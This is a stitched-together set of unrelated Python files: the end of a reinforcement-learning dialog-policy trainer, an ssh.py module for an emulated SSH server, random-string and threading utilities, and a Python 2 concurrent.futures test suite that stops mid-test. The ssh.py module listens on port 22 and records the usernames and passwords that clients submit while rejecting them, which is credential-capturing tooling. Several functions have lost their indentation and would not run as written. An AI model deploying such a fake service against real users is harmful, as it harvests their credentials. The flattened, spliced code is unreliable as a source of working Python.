                next_s, done, _ = env.step(s, a.cpu())
                next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db)).to(device=DEVICE)
                log_pi = self.policy.get_log_prob(s_vec, a)
                # r = self.rewarder.estimate(s_vec, a, next_s_vec, log_pi)
                r = env.get_reward()
                v = self.value(s_vec).squeeze(-1)
                # reward.append(r.item())
                reward.append(r)
                value.append(v.item())
                s = next_s
                print('sys', s['last_sys_action'])
                print('usr', s['user_action'])
                if done:
                    mask.append(0)
                    turn = t + 2  # one due to counting from 0, the one for the last turn
                    break
                mask.append(1)

            reward_tot.append(np.mean(reward))
            turn_tot.append(turn)
            match_tot += self.evaluator.match_rate(s)
            inform_tot.append(self.evaluator.inform_F1(s))
            reward = torch.Tensor(reward)
            value = torch.Tensor(value)
            mask = torch.LongTensor(mask)
            A_sa, v_target = self.est_adv(reward, value, mask)
            print('turn', turn)
            # print('reward', A_sa.tolist())
            print('reward', v_target[0].item())
            match_session = self.evaluator.match_rate(s, True)
            print('match', match_session)
            inform_session = self.evaluator.inform_F1(s, True)
            print('inform', inform_session)
            # success requires both perfect match and perfect inform; a None
            # metric counts as not-applicable rather than failure
            if (match_session == 1 and inform_session[1] == 1) \
                    or (match_session == 1 and inform_session[1] is None) \
                    or (match_session is None and inform_session[1] == 1):
                print('success', 1)
                success_tot.append(1)
            else:
                print('success', 0)
                success_tot.append(0)

        logging.info('reward {}'.format(np.mean(reward_tot)))
        logging.info('turn {}'.format(np.mean(turn_tot)))
        logging.info('match {}'.format(np.mean(match_tot)))
        TP, FP, FN = np.sum(inform_tot, 0)
        prec = TP / (TP + FP)
        rec = TP / (TP + FN)
        F1 = 2 * prec * rec / (prec + rec)
        logging.info('inform rec {}, F1 {}'.format(rec, F1))
        logging.info('success {}'.format(np.mean(success_tot)))
def save(self, directory, epoch, rl_only=False):
if not os.path.exists(directory):
os.makedirs(directory)
""""
if not rl_only:
self.rewarder.save_irl(directory, epoch)
"""
torch.save(self.value.state_dict(), directory + '/' + str(epoch) + '_ppo.val.mdl')
torch.save(self.policy.state_dict(), directory + '/' + str(epoch) + '_ppo.pol.mdl')
logging.info('<<dialog policy>> epoch {}: saved network to mdl'.format(epoch))
    def load(self, filename):
        """Restore world-model ensemble, value and policy weights from the
        checkpoint prefix *filename*.

        :return: the saved best-metrics list from '<filename>.pkl', or fresh
                 defaults when that pickle does not exist
        """
        # self.rewarder.load_irl(filename)
        # load every member of the world-model ensemble
        for idx in range(self.world_model.ensemble_size):
            self.world_model.pick_one(idx)
            self.world_model.load(filename)
        self.world_model.pick_one(None)
        value_mdl = filename + '_ppo.val.mdl'
        policy_mdl = filename + '_ppo.pol.mdl'
        if os.path.exists(value_mdl):
            self.value.load_state_dict(torch.load(value_mdl))
            logging.info('<<dialog policy>> loaded checkpoint from file: {}'.format(value_mdl))
        if os.path.exists(policy_mdl):
            self.policy.load_state_dict(torch.load(policy_mdl))
            logging.info('<<dialog policy>> loaded checkpoint from file: {}'.format(policy_mdl))
        best_pkl = filename + '.pkl'
        if os.path.exists(best_pkl):
            with open(best_pkl, 'rb') as f:
                best = pickle.load(f)
        else:
            # NOTE(review): slot meanings inferred from update() usage
            # (0: policy loss, 1: irl loss, 2: reward, 3: world-model metrics)
            # — confirm against the training script.
            best = [float('inf'), float('inf'), float('-inf'),
                    {'pi': [float('inf')] * self.world_model.ensemble_size,
                     'done': [float('inf')] * self.world_model.ensemble_size}]
        return best
"""
def sample_w_world_model(self, batchsz):
sampled_num = 0
sampled_traj_num = 0
traj_len = 40
real_traj_len = 0
model_horizon = 5
env = self.env_list[0]
real_buff = Memory(VanillaTransition)
sim_buff = Memory(VanillaTransition)
while sampled_num < batchsz:
s = env.reset()
for t in range(traj_len):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(state_vectorize(s, env.cfg, env.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with env
next_s, done = env.step(s, a)
# a flag indicates ending or not
mask = 0 if done or (t == (traj_len - 1)) else 1
# get reward compared to demostrations
next_s_vec = torch.Tensor(state_vectorize(next_s, env.cfg, env.db))
# save to queue
real_buff.push(s_vec.numpy(), a.numpy(), mask, next_s_vec.numpy())
if done:
break
real_next_s = deepcopy(next_s)
# world model takes control
for idx in range(self.world_model.ensemble_size):
s = deepcopy(real_next_s)
self.world_model.pick_one(idx)
self.world_model.take_over(env.goal)
for sim_t in range(model_horizon):
s_vec = torch.Tensor(state_vectorize(s, self.world_model.cfg, self.world_model.db))
a = self.policy.select_action(s_vec.to(device=DEVICE)).cpu()
# interact with world model
next_s, done = self.world_model.step(s, a)
# a flag indicates ending or not
mask = 0 if done or (sim_t == (model_horizon - 1)) else 1
# get reward compared to demostrations
next_s_vec = torch.Tensor(state_vectorize(next_s, self.world_model.cfg, self.world_model.db))
# save to queue
sim_buff.push(s_vec.numpy(), a.numpy(), mask, next_s_vec.numpy())
self.world_model.pick_one(None)
next_s = real_next_s
# update per step
s = next_s
real_traj_len = t
# this is end of one trajectory
sampled_num += real_traj_len
sampled_traj_num += 1
print("{}/{}".format(sampled_num, batchsz))
return real_buff.get_batch(), sim_buff.get_batch()
"""
|
ssh.py | import util
import os
import socket
import paramiko
from threading import Thread
from service import Service
from time import sleep
from stubssh import SSHStub, SSHHandler
from zoption import Zoption
class ssh(Service):
    def __init__(self):
        """Set up service metadata: listen on port 22 by default and expose a
        'priv_key' option (None means a temporary key will be generated)."""
        super(ssh, self).__init__('SSH Server')
        self.config['port'].value = 22
        # optional path to an RSA private key; when left None, initialize()
        # generates ./privkey.key via openssl and cleanup() removes it again
        self.config.update({"priv_key": Zoption(type="str",
                                                value=None,
                                                required=False,
                                                display="Private key (None to generate)")
                            })
        self.info = """
                    Emulate a basic SSH service; stores usernames/passwords
                    but rejects requests.
                    """
def cleanup(self):
""" If we weren't given a private key, remove the temp we generated
"""
if self.config['priv_key'].value == './privkey.key':
os.system('rm -f privkey.key')
def initialize_bg(self):
if self.config['priv_key'].value is not None:
paramiko.RSAKey.from_private_key_file( \
self.config['priv_key'].value)
util.Msg('Initializing SSH server...')
thread = Thread(target=self.initialize)
thread.start()
sleep(1)
if self.running:
return True
else:
return False
    def initialize(self):
        """Accept loop for the emulated SSH service.

        Generates an RSA key with openssl when none was configured, binds the
        listening socket, and for each connection starts a paramiko Transport
        backed by SSHStub. Runs until self.running is cleared or a fatal error
        occurs; always clears self.running and calls cleanup() on exit.
        """
        priv_key = self.config['priv_key'].value
        try:
            # try importing here so we can catch it right away
            import paramiko
        except ImportError:
            util.Error('Paramiko libraries required for this module.')
            return

        # silence paramiko's logging below CRITICAL
        level = getattr(paramiko.common, 'CRITICAL')
        paramiko.common.logging.basicConfig(level=level)

        # if the user did not specify a key, generate one
        if priv_key is None:
            if not util.check_program('openssl'):
                util.Error('OpenSSL required to generate cert/key files.')
                return

            if not util.does_file_exist('./privkey.key'):
                util.debug('Generating RSA private key...')
                util.init_app('openssl genrsa -out privkey.key 2048')
                util.debug('privkey.key was generated.')
            # remember the generated path so cleanup() knows to delete it
            priv_key = self.config['priv_key'].value = './privkey.key'

        try:
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
            # short timeout so the accept loop can notice self.running changes
            server_socket.settimeout(3)
            server_socket.bind(('0.0.0.0', self.config['port'].value))
            server_socket.listen(1)

            self.running = True
            while self.running:
                try:
                    con, addr = server_socket.accept()
                except KeyboardInterrupt:
                    return
                except:
                    # timeout
                    continue

                pkey = paramiko.RSAKey.from_private_key_file(priv_key)
                transport = paramiko.Transport(con)
                transport.add_server_key(pkey)
                transport.set_subsystem_handler('handler', paramiko.SFTPServer, SSHHandler)
                # hand the stub the logging hooks it needs to record credentials
                context = {'dump': self.dump, 'log_data': self.log_data,
                           'log_file': self.log_file}
                server = SSHStub(context)
                try:
                    transport.start_server(server=server)
                    transport.accept()
                    # keep the session alive until the peer disconnects
                    while transport.is_active():
                        sleep(1)
                except socket.error as j:
                    if j.errno == 104:
                        # just means we've got a broken pipe, or
                        # the peer dropped unexpectedly
                        continue
                    else:
                        raise Exception()
                except IOError:
                    util.Error('There was an error reading the keyfile.')
                    return False
                except EOFError:
                    # thrown when we dont get the key correctly, or
                    # remote host gets mad because the key changed
                    continue
                except:
                    raise Exception()
        except KeyboardInterrupt:
            pass
        except Exception as j:
            util.Error('Error with server: %s' % j)
        finally:
            self.running = False
            self.cleanup()
    def cli(self, parser):
        """Register this module's command-line switch on *parser*.

        The destination comes from self.which so the framework can map the
        flag back to this service instance.
        """
        parser.add_argument('--ssh', help='SSH Server', action='store_true',
                            default=False, dest=self.which)
|
utils.py | from .repo import ProcessError
from threading import Thread
# Use the system PRNG if possible
import hashlib, random, time

try:
    # SystemRandom() itself raises NotImplementedError when os.urandom() is
    # unavailable on this platform — that is the condition we want to probe.
    # BUG FIX: the previous code additionally called r.getstate(), which
    # *always* raises NotImplementedError for SystemRandom, so the secure
    # PRNG was never actually selected.
    random = random.SystemRandom()
    using_sysrandom = True
except NotImplementedError:
    using_sysrandom = False
def get_random_string(length=12, allowed_chars='abcdefghijklmnopqrstuvwxyz'
                                               'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
    """
    Returns a securely generated random string.
    The default length of 12 with the a-z, A-Z, 0-9 character set returns
    a 71-bit value. log_2((26+26+10)^12) =~ 71 bits
    """
    return ''.join(random.choice(allowed_chars) for _ in range(length))
def get_secure_random_string(*args, **kwargs):
    """Like get_random_string(), but re-seeds the fallback PRNG when the
    system CSPRNG is unavailable, to make the output harder to predict.

    All arguments are forwarded to get_random_string().
    """
    if not using_sysrandom:
        # This is ugly, and a hack, but it makes things better than
        # the alternative of predictability. This re-seeds the PRNG
        # using a value that is hard for an attacker to predict, every
        # time a random string is required. This may change the
        # properties of the chosen random sequence slightly, but this
        # is better than absolute predictability.
        # BUG FIX: hashlib.sha256() requires bytes on Python 3 — encode the
        # seed material before hashing.
        seed_material = "%s%s%s" % (random.getstate(), time.time(), __file__)
        random.seed(hashlib.sha256(seed_material.encode('utf-8')).digest())
    return get_random_string(*args, **kwargs)
class AsyncResult(object):
    """Run *func* on a background thread immediately; call do() to join and
    fetch the outcome.

    NOTE(review): a ProcessError raised by func is *returned* from do(), not
    re-raised. If func raises any other exception, self.result is never set
    and do() raises AttributeError — confirm callers only expect ProcessError.
    """

    def __init__(self, func, args=(), kwargs=None):
        # avoid a shared mutable default for kwargs
        if kwargs is None:
            kwargs = {}
        self.func = func
        # start the work immediately; do() joins the thread later
        self.thread = Thread(target=self.run, args=args, kwargs=kwargs)
        self.thread.start()

    def run(self, *args, **kwargs):
        # executed on the worker thread
        try:
            self.result = self.func(*args, **kwargs)
        except ProcessError as e:
            # store the error as the result instead of crashing the thread
            self.result = e

    def do(self):
        """Block until the call finishes and return its result (or the
        captured ProcessError)."""
        self.thread.join()
        return self.result
def with_lock(func, lock):
    """Return a wrapper that invokes *func* while holding *lock*.

    :param func: callable to protect
    :param lock: any context-manager lock (threading.Lock/RLock, ...)
    :return: a wrapper with func's metadata preserved via functools.wraps
    """
    from functools import wraps

    @wraps(func)
    def wrapper(*args, **kwargs):
        with lock:
            return func(*args, **kwargs)
    return wrapper
|
test_concurrent_futures.py | from __future__ import print_function
import test.test_support as test_support
# Skip tests if _multiprocessing wasn't built.
test_support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test_support.import_module('multiprocessing.synchronize')
multiprocessing = test_support.import_module('multiprocessing')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test_support.import_module('threading')
from test.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
    """Build a Future whose internal state is forced for fixture purposes."""
    future = Future()
    future._state = state
    future._exception = exception
    future._result = result
    return future
# Shared Future fixtures, one per internal state. These are module-level
# singletons reused across many test classes below, so tests must not
# mutate them.
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
    """Return the product of *x* and *y* (picklable helper for executors)."""
    product = x * y
    return product
def sleep_and_raise(t):
    """Sleep for *t* seconds, then raise a generic Exception (test helper)."""
    time.sleep(t)
    raise Exception('this is an exception')
class MyObject(object):
    """Trivial object used to verify executors don't hold stale references."""
    def my_method(self):
        pass
def _test_traceback():
    """Raise RuntimeError(123) so tests can check traceback propagation."""
    raise RuntimeError(123)
class ExecutorMixin:
    """Create/tear down an executor around each test.

    Subclasses supply ``executor_type`` (thread or process pool); the
    executor is primed in setUp so workers are already started.
    """
    worker_count = 5
    def setUp(self):
        self.t1 = time.time()
        try:
            self.executor = self.executor_type(max_workers=self.worker_count)
        except NotImplementedError as e:
            # Platform cannot provide this executor type; skip, don't fail.
            self.skipTest(str(e))
        self._prime_executor()
    def tearDown(self):
        self.executor.shutdown(wait=True)
        dt = time.time() - self.t1
        if test_support.verbose:
            print("%.2fs" % dt, end=' ')
        self.assertLess(dt, 60, "synchronization issue: test lasted too long")
    def _prime_executor(self):
        # Make sure that the executor is ready to do work before running the
        # tests. This should reduce the probability of timeouts in the tests.
        futures = [self.executor.submit(time.sleep, 0.1)
                   for _ in range(self.worker_count)]
        for f in futures:
            f.result()
class ThreadPoolMixin(ExecutorMixin):
    """ExecutorMixin specialized for ThreadPoolExecutor."""
    executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
    """ExecutorMixin specialized for ProcessPoolExecutor."""
    executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
    """Shutdown behavior shared by thread- and process-pool test classes."""
    def test_run_after_shutdown(self):
        # submit() after shutdown() must be rejected.
        self.executor.shutdown()
        self.assertRaises(RuntimeError,
                          self.executor.submit,
                          pow, 2, 5)
    def test_interpreter_shutdown(self):
        # Test the atexit hook for shutdown of worker threads and processes
        rc, out, err = assert_python_ok('-c', """if 1:
            from concurrent.futures import {executor_type}
            import time
            import sys
            def sleep_and_print(t, msg):
                time.sleep(t)
                print(msg)
                sys.stdout.flush()
            t = {executor_type}(5)
            t.submit(sleep_and_print, 1.0, "apple")
            """.format(executor_type=self.executor_type.__name__))
        # Errors in atexit hooks don't change the process exit code, check
        # stderr manually.
        self.assertFalse(err)
        self.assertEqual(out.strip(), b"apple")
    def test_hang_issue12364(self):
        # Futures submitted before shutdown must still complete afterwards.
        fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
        self.executor.shutdown()
        for f in fs:
            f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
    """Thread-pool specific shutdown tests; workers must terminate cleanly."""
    def _prime_executor(self):
        # Deliberately skip priming: these tests count the worker threads
        # that submit() creates on demand.
        pass
    def test_threads_terminate(self):
        self.executor.submit(mul, 21, 2)
        self.executor.submit(mul, 6, 7)
        self.executor.submit(mul, 3, 14)
        self.assertEqual(len(self.executor._threads), 3)
        self.executor.shutdown()
        for t in self.executor._threads:
            t.join()
    def test_context_manager_shutdown(self):
        with futures.ThreadPoolExecutor(max_workers=5) as e:
            executor = e
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for t in executor._threads:
            t.join()
    def test_del_shutdown(self):
        # Dropping the last reference must also shut the pool down.
        executor = futures.ThreadPoolExecutor(max_workers=5)
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        for t in threads:
            t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
    """Process-pool specific shutdown tests; child processes must exit."""
    def _prime_executor(self):
        # Deliberately skip priming; see test_processes_terminate.
        pass
    def test_processes_terminate(self):
        self.executor.submit(mul, 21, 2)
        self.executor.submit(mul, 6, 7)
        self.executor.submit(mul, 3, 14)
        # Process pools spawn all max_workers processes up front.
        self.assertEqual(len(self.executor._processes), 5)
        processes = self.executor._processes
        self.executor.shutdown()
        for p in processes.values():
            p.join()
    def test_context_manager_shutdown(self):
        with futures.ProcessPoolExecutor(max_workers=5) as e:
            processes = e._processes
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for p in processes.values():
            p.join()
    def test_del_shutdown(self):
        # Dropping the last reference must stop the management thread and
        # the worker processes.
        executor = futures.ProcessPoolExecutor(max_workers=5)
        list(executor.map(abs, range(-5, 5)))
        queue_management_thread = executor._queue_management_thread
        processes = executor._processes
        del executor
        queue_management_thread.join()
        for p in processes.values():
            p.join()
class WaitTests:
    """Tests for futures.wait() with the various return_when policies.

    Mixed into thread- and process-pool TestCases below; uses the shared
    module-level fixture futures (CANCELLED_FUTURE etc.).
    """
    def test_first_completed(self):
        future1 = self.executor.submit(mul, 21, 2)
        future2 = self.executor.submit(time.sleep, 1.5)
        done, not_done = futures.wait(
                [CANCELLED_FUTURE, future1, future2],
                return_when=futures.FIRST_COMPLETED)
        self.assertEqual(set([future1]), done)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
    def test_first_completed_some_already_completed(self):
        future1 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                 [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
                 return_when=futures.FIRST_COMPLETED)
        self.assertEqual(
                set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
                finished)
        self.assertEqual(set([future1]), pending)
    def test_first_exception(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(sleep_and_raise, 1.5)
        future3 = self.executor.submit(time.sleep, 3)
        finished, pending = futures.wait(
                [future1, future2, future3],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([future1, future2]), finished)
        self.assertEqual(set([future3]), pending)
    def test_first_exception_some_already_complete(self):
        future1 = self.executor.submit(divmod, 21, 0)
        future2 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 future1, future2],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              future1]), finished)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
    def test_first_exception_one_already_failed(self):
        future1 = self.executor.submit(time.sleep, 2)
        finished, pending = futures.wait(
                 [EXCEPTION_FUTURE, future1],
                 return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([EXCEPTION_FUTURE]), finished)
        self.assertEqual(set([future1]), pending)
    def test_all_completed(self):
        future1 = self.executor.submit(divmod, 2, 0)
        future2 = self.executor.submit(mul, 2, 21)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 future1,
                 future2],
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              future1,
                              future2]), finished)
        self.assertEqual(set(), pending)
    def test_timeout(self):
        future1 = self.executor.submit(mul, 6, 7)
        future2 = self.executor.submit(time.sleep, 6)
        finished, pending = futures.wait(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2],
                timeout=5,
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE,
                              future1]), finished)
        self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
    """WaitTests on a thread pool, plus a thread-specific race regression."""
    def test_pending_calls_race(self):
        # Issue #14406: multi-threaded race condition when waiting on all
        # futures.
        event = threading.Event()
        def future_func():
            event.wait()
        # NOTE(review): sys.getcheckinterval/setcheckinterval are Python 2
        # only (removed in Python 3.9) -- this test is py2-specific.
        oldcheckinterval = sys.getcheckinterval()
        sys.setcheckinterval(1)
        try:
            fs = {self.executor.submit(future_func) for i in range(100)}
            event.set()
            futures.wait(fs, return_when=futures.ALL_COMPLETED)
        finally:
            sys.setcheckinterval(oldcheckinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
    """WaitTests run against a process pool; no extra cases needed."""
    pass
class AsCompletedTests:
    """Tests for futures.as_completed(), mixed into both pool flavors."""
    # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
    def test_no_timeout(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(mul, 7, 6)
        completed = set(futures.as_completed(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2]))
        self.assertEqual(set(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2]),
                completed)
    def test_zero_timeout(self):
        future1 = self.executor.submit(time.sleep, 2)
        completed_futures = set()
        try:
            for future in futures.as_completed(
                    [CANCELLED_AND_NOTIFIED_FUTURE,
                     EXCEPTION_FUTURE,
                     SUCCESSFUL_FUTURE,
                     future1],
                    timeout=0):
                completed_futures.add(future)
        except futures.TimeoutError:
            # Expected: future1 is still sleeping when the timeout fires.
            pass
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE]),
                         completed_futures)
    def test_duplicate_futures(self):
        # Issue 20367. Duplicate futures should not raise exceptions or give
        # duplicate responses.
        future1 = self.executor.submit(time.sleep, 2)
        completed = [f for f in futures.as_completed([future1,future1])]
        self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
    """AsCompletedTests run against a thread pool."""
    pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
    """AsCompletedTests run against a process pool."""
    pass
class ExecutorTest:
    """submit()/map() behavior shared by both executor flavors."""
    # Executor.shutdown() and context manager usage is tested by
    # ExecutorShutdownTest.
    def test_submit(self):
        future = self.executor.submit(pow, 2, 8)
        self.assertEqual(256, future.result())
    def test_submit_keyword(self):
        future = self.executor.submit(mul, 2, y=8)
        self.assertEqual(16, future.result())
    def test_map(self):
        self.assertEqual(
                list(self.executor.map(pow, range(10), range(10))),
                list(map(pow, range(10), range(10))))
    def test_map_exception(self):
        # NOTE(review): i.next() is the Python 2 iterator protocol; Python 3
        # would need next(i).
        i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
        self.assertEqual(i.next(), (0, 1))
        self.assertEqual(i.next(), (0, 1))
        self.assertRaises(ZeroDivisionError, i.next)
    def test_map_timeout(self):
        results = []
        try:
            for i in self.executor.map(time.sleep,
                                       [0, 0, 6],
                                       timeout=5):
                results.append(i)
        except futures.TimeoutError:
            pass
        else:
            self.fail('expected TimeoutError')
        # Only the two fast sleeps complete before the timeout.
        self.assertEqual([None, None], results)
    def test_shutdown_race_issue12456(self):
        # Issue #12456: race condition at shutdown where trying to post a
        # sentinel in the call queue blocks (the queue is full while processes
        # have exited).
        self.executor.map(str, [2] * (self.worker_count + 1))
        self.executor.shutdown()
    @unittest.skip("Can't pickle bound methods in python2")
    @test_support.cpython_only
    def test_no_stale_references(self):
        # Issue #16284: check that the executors don't unnecessarily hang onto
        # references.
        my_object = MyObject()
        my_object_collected = threading.Event()
        my_object_callback = weakref.ref(
            my_object, lambda obj: my_object_collected.set())
        # Deliberately discarding the future.
        self.executor.submit(my_object.my_method)
        del my_object
        collected = my_object_collected.wait(timeout=5.0)
        self.assertTrue(collected,
                        "Stale reference not collected within timeout.")
    def test_max_workers_negative(self):
        for number in (0, -1):
            with self.assertRaisesRegexp(ValueError,
                                         "max_workers must be greater "
                                         "than 0"):
                self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
    """Thread-pool specific ExecutorTest additions."""
    def test_map_submits_without_iteration(self):
        """Tests verifying issue 11777."""
        finished = []
        def record_finished(n):
            finished.append(n)
        self.executor.map(record_finished, range(10))
        self.executor.shutdown(wait=True)
        self.assertEqual(sorted(finished), range(10))
    def test_default_workers(self):
        # Default max_workers is 5x the CPU count (futures backport default).
        executor = self.executor_type()
        self.assertEqual(executor._max_workers,
                         (multiprocessing.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
    """Process-pool specific ExecutorTest additions."""
    def test_killed_child(self):
        # When a child process is abruptly terminated, the whole pool gets
        # "broken".
        futures = [self.executor.submit(time.sleep, 3)]
        # Get one of the processes, and terminate (kill) it
        p = next(iter(self.executor._processes.values()))
        p.terminate()
        for fut in futures:
            self.assertRaises(BrokenProcessPool, fut.result)
        # Submitting other jobs fails as well.
        self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
    def test_map_chunksize(self):
        def bad_map():
            list(self.executor.map(pow, range(40), range(40), chunksize=-1))
        ref = list(map(pow, range(40), range(40)))
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=6)),
            ref)
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=50)),
            ref)
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=40)),
            ref)
        self.assertRaises(ValueError, bad_map)
    def test_traceback(self):
        # Exceptions raised in a worker must surface with their real type
        # and args in the parent process.
        future = self.executor.submit(_test_traceback)
        with self.assertRaises(Exception) as cm:
            future.result()
        exc = cm.exception
        self.assertIs(type(exc), RuntimeError)
        self.assertEqual(exc.args, (123,))
class FutureTests(unittest.TestCase):
    """Direct tests of the Future object: callbacks, state transitions,
    repr, and result/exception retrieval with timeouts."""
    def test_done_callback_with_result(self):
        callback_result = [None]
        def fn(callback_future):
            callback_result[0] = callback_future.result()
        f = Future()
        f.add_done_callback(fn)
        f.set_result(5)
        self.assertEqual(5, callback_result[0])
    def test_done_callback_with_exception(self):
        callback_exception = [None]
        def fn(callback_future):
            callback_exception[0] = callback_future.exception()
        f = Future()
        f.add_done_callback(fn)
        f.set_exception(Exception('test'))
        self.assertEqual(('test',), callback_exception[0].args)
    def test_done_callback_with_cancel(self):
        was_cancelled = [None]
        def fn(callback_future):
            was_cancelled[0] = callback_future.cancelled()
        f = Future()
        f.add_done_callback(fn)
        self.assertTrue(f.cancel())
        self.assertTrue(was_cancelled[0])
    def test_done_callback_raises(self):
        # Use assert_python_ok since can't capture stderr from logger
        rc, out, err = assert_python_ok('-c', """if 1:
            from concurrent.futures import Future
            raising_was_called = [False]
            fn_was_called = [False]
            def raising_fn(callback_future):
                raising_was_called[0] = True
                raise Exception('doh!')
            def fn(callback_future):
                fn_was_called[0] = True
            f = Future()
            f.add_done_callback(raising_fn)
            f.add_done_callback(fn)
            f.set_result(5)
            assert raising_was_called[0]
            assert fn_was_called[0]
            """)
        self.assertEqual(rc, 0)
        self.assertEqual(out, "")
        self.assertIn('Exception: doh!', err)
    def test_done_callback_already_successful(self):
        # Callbacks added after completion run immediately.
        callback_result = [None]
        def fn(callback_future):
            callback_result[0] = callback_future.result()
        f = Future()
        f.set_result(5)
        f.add_done_callback(fn)
        self.assertEqual(5, callback_result[0])
    def test_done_callback_already_failed(self):
        callback_exception = [None]
        def fn(callback_future):
            callback_exception[0] = callback_future.exception()
        f = Future()
        f.set_exception(Exception('test'))
        f.add_done_callback(fn)
        self.assertEqual(('test',), callback_exception[0].args)
    def test_done_callback_already_cancelled(self):
        was_cancelled = [None]
        def fn(callback_future):
            was_cancelled[0] = callback_future.cancelled()
        f = Future()
        self.assertTrue(f.cancel())
        f.add_done_callback(fn)
        self.assertTrue(was_cancelled[0])
    def test_repr(self):
        self.assertRegexpMatches(repr(PENDING_FUTURE),
                                 '<Future at 0x[0-9a-f]+ state=pending>')
        self.assertRegexpMatches(repr(RUNNING_FUTURE),
                                 '<Future at 0x[0-9a-f]+ state=running>')
        self.assertRegexpMatches(repr(CANCELLED_FUTURE),
                                 '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
                                 '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegexpMatches(
                repr(EXCEPTION_FUTURE),
                '<Future at 0x[0-9a-f]+ state=finished raised OSError>')
        self.assertRegexpMatches(
                repr(SUCCESSFUL_FUTURE),
                '<Future at 0x[0-9a-f]+ state=finished returned int>')
    def test_cancel(self):
        # Only pending futures are cancellable; running/finished are not.
        f1 = create_future(state=PENDING)
        f2 = create_future(state=RUNNING)
        f3 = create_future(state=CANCELLED)
        f4 = create_future(state=CANCELLED_AND_NOTIFIED)
        f5 = create_future(state=FINISHED, exception=OSError())
        f6 = create_future(state=FINISHED, result=5)
        self.assertTrue(f1.cancel())
        self.assertEqual(f1._state, CANCELLED)
        self.assertFalse(f2.cancel())
